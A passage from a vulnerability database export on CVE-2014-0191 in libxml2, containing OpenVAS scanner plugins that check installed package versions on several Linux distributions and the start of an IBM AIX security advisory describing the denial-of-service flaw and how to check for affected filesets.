exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-debuginfo\", rpm:\"libxml2-debuginfo~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-static\", rpm:\"libxml2-static~2.9.1~1.1.30.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Check the version of libxml2", "modified": "2019-03-08T00:00:00", "published": "2015-04-01T00:00:00", "id": "OPENVAS:1361412562310882149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882149", "type": "openvas", "title": "CentOS Update for libxml2 CESA-2015:0749 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libxml2 CESA-2015:0749 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882149\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-01 07:25:04 +0200 (Wed, 01 Apr 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for libxml2 CESA-2015:0749 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of libxml2\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. 
Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\");\n script_tag(name:\"affected\", value:\"libxml2 on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0749\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-April/021029.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-static\", rpm:\"libxml2-static~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-31T10:48:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Daniel P. 
Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.", "modified": "2017-07-14T00:00:00", "published": "2014-07-11T00:00:00", "id": "OPENVAS:702978", "href": "http://plugins.openvas.org/nasl.php?oid=702978", "type": "openvas", "title": "Debian Security Advisory DSA 2978-1 (libxml2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2978.nasl 6724 2017-07-14 09:57:17Z teissa $\n# Auto-generated from advisory DSA 2978-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libxml2 on Debian Linux\";\ntag_insight = \"XML is a metalanguage to let you design your own markup language.\nA regular markup language defines a way to describe information in\na certain class of documents (eg HTML). XML lets you define your\nown customized markup languages for many classes of document. 
It\ncan do this because it's written in SGML, the international standard\nmetalanguage for markup languages.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\";\ntag_summary = \"Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702978);\n script_version(\"$Revision: 6724 $\");\n script_cve_id(\"CVE-2014-0191\");\n script_name(\"Debian Security Advisory DSA 2978-1 (libxml2 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-14 11:57:17 +0200 (Fri, 14 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-07-11 00:00:00 +0200 (Fri, 11 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2978.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868768", "type": "openvas", "title": "Fedora Update for mingw-libxml2 FEDORA-2014-17609", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mingw-libxml2 FEDORA-2014-17609\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868768\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:50:49 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for mingw-libxml2 FEDORA-2014-17609\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mingw-libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mingw-libxml2 on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17609\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147320.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"mingw-libxml2\", rpm:\"mingw-libxml2~2.9.2~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-05-19T00:00:00", "id": "OPENVAS:1361412562310841826", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841826", "type": "openvas", "title": "Ubuntu Update for libxml2 USN-2214-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2214_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for libxml2 USN-2214-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841826\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-19 11:25:10 +0530 (Mon, 19 May 2014)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Ubuntu Update for libxml2 USN-2214-1\");\n\n script_tag(name:\"affected\", value:\"libxml2 on Ubuntu 14.04 LTS,\n Ubuntu 13.10,\n Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"insight\", value:\"Daniel Berrange discovered that libxml2 would incorrectly\nperform entity substitution even when requested not to. 
If a user or automated\nsystem were tricked into opening a specially crafted document, an attacker\ncould possibly cause resource consumption, resulting in a denial of service.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2214-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2214-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS|13\\.10|12\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-3ubuntu4.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-5.1ubuntu4.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.6.dfsg-1ubuntu1.11\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = 
isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-3ubuntu2.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-5ubuntu2.5\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Oracle Linux Local Security Checks ELSA-2015-0749", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123148", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-0749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0749.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123148\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0749\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0749 - libxml2 security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0749\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0749.html\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~5.0.1.el7_1.2\", 
rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~5.0.1.el7_1.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~5.0.1.el7_1.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libxml2-static\", rpm:\"libxml2-static~2.9.1~5.0.1.el7_1.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "aix": [{"lastseen": "2020-04-22T00:52:15", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Fri Aug 15 10:26:30 CDT 2014\nUpdated: Fri Aug 22 08:17:41 CDT 2014\nUpdate: fixed APAR availability dates\n|Update: Mon Aug 25 15:18:37 CDT 2014\n|Update Corrected a couple Service Pack level#s\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\n\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: AIX libxml2 vulnerability\n\nPLATFORMS: AIX 6.1 and 7.1 releases\n VIOS 2.2.*\n\nSOLUTION: Apply the fix as described below\n\nTHREAT: A remote attacker could exploit this vulnerability using a\n specially-crafted XML document containing malicious attributes\n to consume all available CPU resources.\n\nCVE Number: CVE-2014-0191 CVSS=5.0\n\nReboot required? NO \nWorkarounds? NO\nProtected by FPM? NO\nProtected by SED? NO\n===============================================================================\n DETAILED INFORMATION\n\nI. 
DESCRIPTION\n\n Libxml2 is vulnerable to a denial of service, caused by the expansion of \n internal entities within the xmlParserHandlePEReference().\n\nII. CVSS\n\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/93092\n for more information\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n Note: To use the following commands on VIOS you must first\n execute:\n\n oem_setup_env\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L bos.rte.control\n\n The following fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n bos.rte.control 6.1.8.0 6.1.8.17 key_w_fix\n bos.rte.control 6.1.9.0 6.1.9.15 key_w_fix\n bos.rte.control 7.1.2.0 7.1.2.17 key_w_fix\n bos.rte.control 7.1.3.0 7.1.3.15 key_w_fix\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ----------------------------------------------------------------\n bos.rte.control 6.1.8.0(2.2.2.0) 6.1.8.17(2.2.2.4)\n bos.rte.control 6.1.9.0(2.2.3.0) 